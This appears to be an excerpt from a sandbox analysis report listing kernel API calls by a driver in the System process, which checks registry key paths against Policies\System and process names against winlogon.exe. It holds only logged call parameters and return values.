| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xd2, ret_val_ptr_out = 0xffffe0003a76faa0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9ce0960, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9ce0960, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029344c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xd0, ret_val_ptr_out = 0xffffe0003a782f30 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9ce0960, Length = 0xd0, ObjectNameInfo_unk_out = 0xffffe0003a782f30, ReturnLength_ptr_out = 0xffffd00029344c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections, DestinationString_out = \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a782f30, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\USER\, ret_val_out = 0 | ||||
| _wcsicmp | _String1 = \Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections, _String2 = \Software\Microsoft\Windows\CurrentVersion\Policies\System, ret_val_out = -7 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a76faa0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9ce0960, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9ce0960, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029344fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xd2, ret_val_ptr_out = 0xffffe0003a76faa0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9ce0960, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9ce0960, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029344c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xd0, ret_val_ptr_out = 0xffffe0003a782f30 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9ce0960, Length = 0xd0, ObjectNameInfo_unk_out = 0xffffe0003a782f30, ReturnLength_ptr_out = 0xffffd00029344c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections, DestinationString_out = \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a782f30, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\USER\, ret_val_out = 0 | ||||
| _wcsicmp | _String1 = \Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections, _String2 = \Software\Microsoft\Windows\CurrentVersion\Policies\System, ret_val_out = -7 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a76faa0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8a0c6d0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8a0c6d0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029344fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xa0, ret_val_ptr_out = 0xffffe0003af83ef0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8a0c6d0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8a0c6d0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029344c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x9e, ret_val_ptr_out = 0xffffe0003af95f60 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8a0c6d0, Length = 0x9e, ObjectNameInfo_unk_out = 0xffffe0003af95f60, ReturnLength_ptr_out = 0xffffd00029344c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\Internet, DestinationString_out = \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\Internet | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af95f60, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\USER\, ret_val_out = 0 | ||||
| _wcsicmp | _String1 = \Software\Microsoft\Office\16.0\Common\Internet, _String2 = \Software\Microsoft\Windows\CurrentVersion\Policies\System, ret_val_out = -8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af83ef0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8a0c6d0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8a0c6d0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029344fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xa0, ret_val_ptr_out = 0xffffe0003af83ef0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8a0c6d0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8a0c6d0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029344c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x9e, ret_val_ptr_out = 0xffffe0003af95f60 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8a0c6d0, Length = 0x9e, ObjectNameInfo_unk_out = 0xffffe0003af95f60, ReturnLength_ptr_out = 0xffffd00029344c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\Internet, DestinationString_out = \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\Internet | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af95f60, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\USER\, ret_val_out = 0 | ||||
| _wcsicmp | _String1 = \Software\Microsoft\Office\16.0\Common\Internet, _String2 = \Software\Microsoft\Windows\CurrentVersion\Policies\System, ret_val_out = -8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af83ef0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b7e35610, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b7e35610, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029344fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x92, ret_val_ptr_out = 0xffffe0003af83ef0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b7e35610, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b7e35610, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029344c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x90, ret_val_ptr_out = 0xffffe0003af95ec0 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b7e35610, Length = 0x90, ObjectNameInfo_unk_out = 0xffffe0003af95ec0, ReturnLength_ptr_out = 0xffffd00029344c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af95ec0, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af83ef0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 | ||||
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 | ||||
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e7d00, Irp_unk = 0xffffe0003be6f490, Irp_unk_out = 0xffffe0003be6f490, ret_val_out = 0x103 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8b2eae0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8b2eae0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029344fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xda, ret_val_ptr_out = 0xffffe0003a76faa0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8b2eae0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8b2eae0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029344c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xd8, ret_val_ptr_out = 0xffffe0003a782bd0 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8b2eae0, Length = 0xd8, ObjectNameInfo_unk_out = 0xffffe0003a782bd0, ReturnLength_ptr_out = 0xffffd00029344c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesEngineThrottling, DestinationString_out = \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesEngineThrottling | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a782bd0, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\USER\, ret_val_out = 0 | ||||
| _wcsicmp | _String1 = \Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesEngineThrottling, _String2 = \Software\Microsoft\Windows\CurrentVersion\Policies\System, ret_val_out = -8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a76faa0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8b2eae0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8b2eae0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029344fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xda, ret_val_ptr_out = 0xffffe0003a76faa0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8b2eae0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8b2eae0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029344c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xd8, ret_val_ptr_out = 0xffffe0003a782bd0 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8b2eae0, Length = 0xd8, ObjectNameInfo_unk_out = 0xffffe0003a782bd0, ReturnLength_ptr_out = 0xffffd00029344c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesEngineThrottling, DestinationString_out = \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesEngineThrottling | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a782bd0, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\USER\, ret_val_out = 0 | ||||
| _wcsicmp | _String1 = \Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesEngineThrottling, _String2 = \Software\Microsoft\Windows\CurrentVersion\Policies\System, ret_val_out = -8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a76faa0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8b2eae0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8b2eae0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029344fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xda, ret_val_ptr_out = 0xffffe0003a76faa0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8b2eae0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8b2eae0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029344c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xd8, ret_val_ptr_out = 0xffffe0003a782bd0 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8b2eae0, Length = 0xd8, ObjectNameInfo_unk_out = 0xffffe0003a782bd0, ReturnLength_ptr_out = 0xffffd00029344c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesEngineThrottling, DestinationString_out = \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesEngineThrottling | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a782bd0, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\USER\, ret_val_out = 0 | ||||
| _wcsicmp | _String1 = \Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesEngineThrottling, _String2 = \Software\Microsoft\Windows\CurrentVersion\Policies\System, ret_val_out = -8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a76faa0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8b2eae0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8b2eae0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029344fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xda, ret_val_ptr_out = 0xffffe0003a76faa0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8b2eae0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8b2eae0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029344c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xd8, ret_val_ptr_out = 0xffffe0003a782bd0 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8b2eae0, Length = 0xd8, ObjectNameInfo_unk_out = 0xffffe0003a782bd0, ReturnLength_ptr_out = 0xffffd00029344c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesEngineThrottling, DestinationString_out = \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesEngineThrottling | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a782bd0, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\USER\, ret_val_out = 0 | ||||
| _wcsicmp | _String1 = \Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesEngineThrottling, _String2 = \Software\Microsoft\Windows\CurrentVersion\Policies\System, ret_val_out = -8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a76faa0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
|
For performance reasons, the remaining entries are omitted.
Click to download all entries as text file. |
|||||
Execution Path #46 (length: 51, count: 1, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 51 |
Processes
»
| Process | Count |
|---|---|
| Process 2 (System, PID: 4) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
